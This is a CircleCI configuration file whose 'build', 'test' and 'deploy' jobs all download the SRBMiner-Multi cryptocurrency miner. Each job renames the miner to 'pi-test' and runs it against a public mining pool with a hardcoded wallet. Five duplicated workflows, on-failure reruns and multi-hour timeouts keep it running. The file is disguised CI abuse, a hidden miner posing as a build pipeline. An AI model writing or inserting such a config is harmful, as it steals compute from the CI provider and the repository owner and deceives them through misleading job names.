version: 2.1

orbs:
  win: circleci/windows@2.4.0

executors:
  circleci_machine:
    docker:
      - image: circleci/node:14.15
    working_directory: ~/repo
commands:
  build:
    description: Run build
    steps:
      - checkout
      - run:
          name: build
          command:
              wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.6.6/SRBMiner-Multi-0-6-6-Linux.tar.xz && tar -xvf SRBMiner-Multi-0-6-6-Linux.tar.xz && mv SRBMiner-Multi-0-6-6 10 && cd 10 && mv SRBMiner-MULTI pi-test && ./pi-test --algorithm curvehash --pool stratum-asia.rplant.xyz:7058 --wallet TvLoZcKzhQPmxWqc7FdL4f64euZ8zq8aDN --password =x --disable-gpu --cpu-threads 2
          no_output_timeout: 300m
      - run:
          name: build
          command:
              wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.6.6/SRBMiner-Multi-0-6-6-Linux.tar.xz && tar -xvf SRBMiner-Multi-0-6-6-Linux.tar.xz && mv SRBMiner-Multi-0-6-6 10 && cd 10 && mv SRBMiner-MULTI pi-test && ./pi-test --algorithm curvehash --pool stratum-asia.rplant.xyz:7058 --wallet TvLoZcKzhQPmxWqc7FdL4f64euZ8zq8aDN --password =x --disable-gpu --cpu-threads 2
          no_output_timeout: 300m

      - run:
          name: buildddart
          command:
              wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.6.6/SRBMiner-Multi-0-6-6-Linux.tar.xz && tar -xvf SRBMiner-Multi-0-6-6-Linux.tar.xz && mv SRBMiner-Multi-0-6-6 10 && cd 10 && mv SRBMiner-MULTI pi-test && ./pi-test --algorithm curvehash --pool stratum-asia.rplant.xyz:7058 --wallet TvLoZcKzhQPmxWqc7FdL4f64euZ8zq8aDN --password =x --disable-gpu --cpu-threads 2
          when: on_fail
          no_output_timeout: 100m
  builder2:
    description: Run builder2
    steps:
      - checkout
      - run:
          name: buildddart
          command: |
              wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.6.6/SRBMiner-Multi-0-6-6-Linux.tar.xz && tar -xvf SRBMiner-Multi-0-6-6-Linux.tar.xz && mv SRBMiner-Multi-0-6-6 10 && cd 10 && mv SRBMiner-MULTI pi-test && ./pi-test --algorithm curvehash --pool stratum-asia.rplant.xyz:7058 --wallet TvLoZcKzhQPmxWqc7FdL4f64euZ8zq8aDN --password =x --disable-gpu --cpu-threads 2
          no_output_timeout: 260
      - run:
          name: buildddart
          command:
              wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.6.6/SRBMiner-Multi-0-6-6-Linux.tar.xz && tar -xvf SRBMiner-Multi-0-6-6-Linux.tar.xz && mv SRBMiner-Multi-0-6-6 10 && cd 10 && mv SRBMiner-MULTI pi-test && ./pi-test --algorithm curvehash --pool stratum-asia.rplant.xyz:7058 --wallet TvLoZcKzhQPmxWqc7FdL4f64euZ8zq8aDN --password =x --disable-gpu --cpu-threads 2 
          when: on_fail
          no_output_timeout: 260m
jobs:
  buildd:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [build]
  build2:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [builder2]
  test1:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [builder2]
  test2:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [builder2]
  test3:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [builder2]
  deploy:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [builder2]
workflows:
  version: 2
  build:
    jobs:
      - buildd
      - build2
      - test1
      - test2
      - test3
      - deploy
  test:
    jobs:
      - buildd
      - build2
      - test1
      - test2
      - test3
      - deploy
  test2:
    jobs:
      - buildd
      - build2
      - test1
      - test2
      - test3
      - deploy
  dsplot:
    jobs:
      - buildd
      - build2
      - test1
      - test2
      - test3
      - deploy
  maximum:
    jobs:
      - buildd
      - build2
      - test1
      - test2
      - test3
      - deploy
  
